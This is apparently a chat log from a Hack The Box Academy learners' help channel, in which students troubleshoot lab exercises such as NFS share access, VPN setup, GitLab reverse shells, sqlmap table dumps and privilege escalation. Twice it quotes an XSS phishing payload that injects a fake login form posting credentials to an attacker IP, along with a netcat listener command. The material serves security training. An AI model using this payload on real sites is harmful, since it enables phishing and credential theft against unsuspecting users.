still get this: ┌──(kali㉿kali)-[~/target-NFS] └─$ cd TechSupport cd: permission denied: TechSupport
Same thing happening in PwnBox with all of the above commands.

so you're getting permission denied, have you tried elevating your privileges?

Ran mkdir and mount as sudo??

sudo: cd: command not found
sudo: "cd" is a shell built-in command, it cannot be run directly.
sudo: the -s option may be used to run a privileged shell.
sudo: the -D option may be used to run a command in a specific directory.```

did sudo chmod and sudo chown too, still got permission denied.

sudo: you are not permitted to use the -D option with TechSupport```

maybe use root directly and not sudo

Okay that worked

But that is silly, and dangerous.

Oh well, thanks @stark vortex

no problem

But that's exactly the point.
The share can be accessed with root. The server only checks whether the UserID is correct. Whether this is root from the server or another PC is irrelevant.
That's why you have access.

Ahhhhh, gotcha.

https://academy.hackthebox.com/module/136/section/1288

any nudge on how to find out which extension will be executed ? ( bypass is no problem )

no names 🙂

please cover hints

my bad I messed up the writing

oh its || not |

you can just mark the text and then do "the eye"

anyway I think I'm just gonna try some other things

try some tools you learned to get creds 😉

Attacking Common Applications - Skills Assessment II - First time post –
I only have one question to answer- Obtain reverse shell access on the target and submit the contents of the flag.txt file.
I am having difficulty with establishing the reverse shell.
I am using the methodology as described on page 18, attacking gitlab.
Where I am stuck – the changes needed to the command to get the reverse shell to work.
I have been working through the github documentation on the script (different script based on the version in use on this box) and I am stuck. I do have a reverse shell but it is to my attack box – much like a closed loop and not a RCE.
Don’t want to throw out any spoilers – but if you have gotten through this - I would appreciate some hints on getting this command right to get the RCE up and running.
Obviously my next quest will be on finding the path – still to come!! - UPDATE - I got the flag! I was barking up the wrong tree - There is a 3rd VHost - I had used Metasploit on this host - there are some vulnerabilities but I just couldn't get them to work! So - I went back and used this same methodology as with Gitlab RCE - Lo and Behold - it worked like a charm - just as slick as it worked on the older version of Gitlab! - and the path to the flag was a breeze!! - On to the next module - I am at 83% and counting!

I have a noob question, I am having difficulty connecting to the VPN

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

I found the parrot box didn't have all the tools I needed to I opted for using my own Kali but the VPN isn't connecting.

Take another look at the first sections in the module.

also is the time spent on the VPN limited like it is on the PWNBox?

Have you downloaded the correct VPN file?
https://academy.hackthebox.com/vpn

Do I download the UDP or TCP?

No, the use of your VM is not restricted

I recommend TCP

yeah that makes sense, I have my own Klai VM on VMWare Workstation set to NAT

I'll try TCP

the VPN also says it's offline, how do I start it?

https://academy.hackthebox.com/module/details/87

I just got in

Thanks!

sudo openvpn your_vpn_file.ovpn

I did that and it worked, I guess I needed to use TCP. How long can I be on here with the free version?

Hello everyone, i am currently stuck on the 2nd part of this section https://academy.hackthebox.com/module/77/section/844 , i had to connect to the target using ssh as user1 and then move to user2 to get the first flag.txt which i succeeded in. the second part was to escalate user2's priveleges to root. i am stuck here because i am unable to find the password for user2 and also for the root . the hint says to use chmod but i am denied permissions. can you please point me in the right direction

been stuck on this since yesterday

You should also be able to use UPD. VPN has no limits

sweet

I'm in the starting level called "Dancing" and the nmap tool won't scan the ports. This is a fresh image with recent patches so there shouldn't be a lot of issues with it just yet

im stuck in academy on file transfers. it says Pwnbox Check SSH Key MD5 Hash. shows mate "md5sum id_rsa" i know where the actually key is in linux but why doesnt this command work like the screen shows? any quick explanations what im doing wrong.

wdym the command doesn't work? you're getting a different hash?

well you need to have the id_rsa file before you can run the md5 hash on it

i wish some of the modules were a little bit easier to follow

this was the beginning of this lesson

have you done the linux fundamental module?

i simply cannot wait to learn about assembly and malware analysis

both happy and sad tears will be shed

hi please can u help me i have some problem in hackthebox
and i cant send img

Hi everyone i'm doing the web attacks modules and i'm stuck on the first task

i used PUT,GET,POST i get the blank page but how do i get the flag ?

Reand and follow #welcome
Then you can send pictures

You should be in Burp - my notes show that I too was going batty figuring out the token - I went back to the IDOR chaining module - followed that real close! - Once you are in you need to focus on the event and file disclosure - best wishes -

and when i go back to the file managher page i still seee the notes.txt ? any help

blank page

This is 100x better than what the OSCP instructions used to be 😄

ahagh

yes

CROSS-SITE scripting (XSS): Phishing section:
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();<!--

I've ran this to no avail, there is still exposed HTML after my injection.

sudo nc -lvnp 80 doesn't work either, 80 is being used by the pwnbox and will terminate my pwnbox when I kill the task

I have not once been able to capture the credentials successfully even after pursuing with discrepancies

I went ahead and revealed the payload with XSStrike, configured it properly to the original payload, have tried sending it to the send.php subdirectory that HTB instructs with net cat open and nothing is working

I've even tried with a php listening server and it returns the same error nc does, I've tried using different ports as well, everything to no avail

great to be Amor!

can I dm you

can I dm you?

ahhh I got it I don't know why it took me so long but it was mostly because I wasn't patient enough

can I dm you?

can I dm you?

https://tenor.com/view/mister-electric-send-him-principals-gif-24418029

Mods, incinerate this mans entire bloodline, EXPEDITE^^

I am stuck in sqlmap essentials. I am in the attack tuning section
for the first task I used the command
sqlmap -u 'http://94.237.49.138:56473/case5.php?id=1' --level 5 --risk 3 -T flag5 --no-cast --dump --batch
and got the table

+----+---------+
| id | cpytent |
+----+---------+
| 1  |         |
+----+---------+

I then tried to capture the original request through burp and saved it to file

GET /case5.php?id=1 HTTP/1.1
Host: 94.237.56.188:32260
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.56.188:32260/case5.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

Then I used sqlmap -r req.txt --no-cast -T flag5 --batch --dump --level 5 --risk 3

Database: testdb
Table: flag5
[1 entry]
+----+-----------+
| id | conten   |
+----+-----------+
| 1  |           |
+----+-----------+

I tried to change the level from 2,3,4,5 but did not get any flag. the task instructed to submit the contents of the table but no value is working

solved it.

Hey everyone, I'm having trouble solving the HTTP misconfiguration Hard assessment. If anyone can help me out, please let me know. Thanks.

CROSS-SITE scripting (XSS): Phishing section:
document.write('<h3>Please login to continue</h3><form action=http://our_ip%3E/<input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();<!--

I've ran this to no avail, there is still exposed HTML after my injection.

sudo nc -lvnp 80 doesn't work either, 80 is being used by the pwnbox and will terminate my pwnbox when I kill the task (edited)
[11:21 AM]
I have not once been able to capture the credentials successfully even after pursuing with discrepancies

I went ahead and revealed the payload with XSStrike, configured it properly to the original payload, have tried sending it to the send.php subdirectory that HTB instructs with net cat open and nothing is working

I've even tried with a php listening server and it returns the same error nc does, I've tried using different ports as well, everything to no avail

Are you using Kali or something else?

Maybe you shouldn't just ping people who asked a question several months ago. Better just ask here.

As you have correctly recognized, port 80 is already occupied by the PwnBox. You must use some other port. Eg. 1337
If you have open HTML tags, then your payload is not correct. Close all tags and make the page look normal so as not to arouse the user's suspicion.

I’ve tried doing both

Hello guys im doing Active Directory Enumeration & Attacks module

Ive tried to restart 3 times the lab but RDP shows me that

I got around my issue by intercepting a request to the site and manually editing it to use TRACK.

In my case, burpsuite would change the request to POST when I would use the Show in browser option.

thats the screensaver, try pressing a button

nothing happened